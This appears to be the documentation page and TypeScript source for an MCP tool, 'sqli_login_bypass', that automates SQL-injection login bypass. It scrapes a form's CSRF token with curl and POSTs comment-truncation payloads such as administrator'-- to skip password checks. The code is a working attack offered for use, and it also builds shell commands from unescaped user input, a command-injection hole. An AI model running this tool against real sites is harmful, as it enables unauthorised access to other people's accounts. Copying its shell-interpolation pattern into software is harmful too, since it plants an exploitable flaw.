sqli_login_bypass
Bypass login authentication using SQL injection comment truncation. Extracts CSRF tokens and submits crafted payloads to test for SQLi vulnerabilities in login forms.
Instructions
Bypass login via SQL comment truncation (administrator'--). Extracts CSRF token from form, then POSTs with SQLi in the username field. The -- comment truncates the password check. Returns csrf_extracted, status_code, response_length, headers, likely_bypass.
Input Schema
TableJSON Schema
| Name | Required | Description | Default |
|---|---|---|---|
| url | Yes | Login form URL, e.g. https://target/login | |
| username | No | Target username to bypass auth for, e.g. 'administrator' | |
| csrf_field | No | Name of the CSRF token field in the form | |
| username_field | No | Name of the username form field | |
| password_field | No | Name of the password form field |
Implementation Reference
- src/tools/sqli.ts:70-129 (handler)The implementation of the sqli_login_bypass tool. It extracts a CSRF token and performs a POST request with SQL injection payloads designed to truncate the SQL password query.
server.tool( "sqli_login_bypass", "Bypass login via SQL comment truncation (administrator'--). Extracts CSRF token from form, then POSTs with SQLi in the username field. The -- comment truncates the password check. Returns csrf_extracted, status_code, response_length, headers, likely_bypass.", { url: z.string().describe("Login form URL, e.g. https://target/login"), username: z.string().optional().describe("Target username to bypass auth for, e.g. 'administrator'"), csrf_field: z.string().optional().describe("Name of the CSRF token field in the form"), username_field: z.string().optional().describe("Name of the username form field"), password_field: z.string().optional().describe("Name of the password form field"), }, async ({ url, username = "administrator", csrf_field = "csrf", username_field = "username", password_field = "password" }) => { requireTool("curl"); // Step 1: extract CSRF token const csrfCmd = `curl -sk '${url}' | grep -oP '${csrf_field}["\\s=]+value=["\\']\\K[^"\\']+' || curl -sk '${url}' | grep -oP '${csrf_field}=\\K[^"&]+'`; const csrfResult = await runShell(csrfCmd); const csrfToken = csrfResult.stdout ? csrfResult.stdout.split("\n")[0].trim() : ""; const payloads = [ `${username}'--`, `${username}'-- -`, `${username}' #`, `${username}'/*`, ]; const results = []; for (const payload of payloads) { const postData = `${csrf_field}=${csrfToken}&${username_field}=${payload}&${password_field}=anything`; const res = await runCmd("curl", [ "-sk", "-D", "-", "-o", "/dev/null", "-w", "\n%{http_code}:%{size_download}:%{redirect_url}", "-X", "POST", "-d", postData, url, ]); const lines = res.stdout.split("\n"); const statusLine = lines.length > 0 ? lines[lines.length - 1] : "0:0:"; const parts = statusLine.split(":"); const status = parts.length > 0 ? parseInt(parts[0], 10) : 0; const redirect = parts.length > 2 ? parts[2] : ""; results.push({ payload, status_code: status, redirect_url: redirect, likely_bypass: [301, 302, 303].includes(status) || redirect.toLowerCase().includes("dashboard") || redirect.toLowerCase().includes("admin"), }); } const result = { csrf_extracted: Boolean(csrfToken), csrf_token: csrfToken.length > 20 ? csrfToken.slice(0, 20) + "..." : csrfToken, results, }; return { content: [{ type: "text" as const, text: JSON.stringify(result, null, 2) }] }; } );